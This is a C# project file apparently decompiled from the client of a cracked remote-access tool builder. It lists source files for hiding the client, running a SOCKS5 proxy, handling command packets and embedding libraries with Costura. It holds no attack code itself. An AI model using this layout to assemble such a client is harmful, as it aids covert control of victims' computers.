73 lines
3.3 KiB
XML
73 lines
3.3 KiB
XML
<?xml version="1.0" encoding="utf-8"?>
|
|
<Project ToolsVersion="4.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
|
<!--Project was exported from assembly: C:\Users\user\Desktop\v3.8.0 Deluxe Plugins (v4.0.0) cracked\Builder\Client.exe-->
|
|
<PropertyGroup>
|
|
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
|
|
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
|
|
<ProjectGuid>{4D08A7F5-99A2-4BDC-B33A-E5B701D7B1AE}</ProjectGuid>
|
|
<OutputType>WinExe</OutputType>
|
|
<AssemblyName>Client</AssemblyName>
|
|
<TargetFrameworkVersion>v4.7.2</TargetFrameworkVersion>
|
|
<ApplicationVersion>1.0.0.0</ApplicationVersion>
|
|
<FileAlignment>512</FileAlignment>
|
|
<LangVersion>10.0</LangVersion>
|
|
</PropertyGroup>
|
|
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
|
|
<PlatformTarget>AnyCPU</PlatformTarget>
|
|
<DebugSymbols>true</DebugSymbols>
|
|
<DebugType>full</DebugType>
|
|
<Optimize>false</Optimize>
|
|
<OutputPath>bin\Debug\</OutputPath>
|
|
<DefineConstants>DEBUG;TRACE</DefineConstants>
|
|
<ErrorReport>prompt</ErrorReport>
|
|
<WarningLevel>4</WarningLevel>
|
|
</PropertyGroup>
|
|
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
|
|
<PlatformTarget>AnyCPU</PlatformTarget>
|
|
<DebugType>pdbonly</DebugType>
|
|
<Optimize>true</Optimize>
|
|
<OutputPath>bin\Release\</OutputPath>
|
|
<DefineConstants>TRACE</DefineConstants>
|
|
<ErrorReport>prompt</ErrorReport>
|
|
<WarningLevel>4</WarningLevel>
|
|
</PropertyGroup>
|
|
<ItemGroup>
|
|
<Reference Include="MessagePackLib">
|
|
<HintPath>..\Raton\lib\MessagePackLib.dll</HintPath>
|
|
</Reference>
|
|
<Reference Include="System" />
|
|
<Reference Include="System.Drawing" />
|
|
<Reference Include="System.Windows.Forms" />
|
|
<Reference Include="netstandard" />
|
|
</ItemGroup>
|
|
<ItemGroup>
|
|
<Compile Include="Program.cs" />
|
|
<Compile Include="ClientBridge.cs" />
|
|
<Compile Include="Config.cs" />
|
|
<Compile Include="HandlePacket.cs" />
|
|
<Compile Include="HideClient.cs" />
|
|
<Compile Include="MutexControl.cs" />
|
|
<Compile Include="Socks5Server.cs" />
|
|
<Compile Include="ShareClient.cs" />
|
|
<Compile Include="SillyClient.cs" />
|
|
<Compile Include="Client_ProcessedByFody.cs" />
|
|
<Compile Include="Client\Properties\Resources.cs" />
|
|
<Compile Include="Client\Properties\Settings.cs" />
|
|
<Compile Include="Client\Raton\PacketReader.cs" />
|
|
<Compile Include="Client\Raton\PacketSender.cs" />
|
|
<Compile Include="Client\Raton\Protocol.cs" />
|
|
<Compile Include="Client\Raton\ClientState.cs" />
|
|
<Compile Include="Client\Raton\Supervisor.cs" />
|
|
<Compile Include="Costura\AssemblyLoader.cs" />
|
|
<Compile Include="AssemblyInfo.cs" />
|
|
</ItemGroup>
|
|
<ItemGroup>
|
|
<EmbeddedResource Include="Client\Properties\Resources.resx" />
|
|
<EmbeddedResource Include="costura.metadata" />
|
|
<EmbeddedResource Include="costura\costura\dll.compressed" />
|
|
<EmbeddedResource Include="costura\costura\pdb.compressed" />
|
|
<EmbeddedResource Include="costura\messagepacklib\dll.compressed" />
|
|
<EmbeddedResource Include="costura\system\buffers\dll.compressed" />
|
|
</ItemGroup>
|
|
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
|
|
</Project> |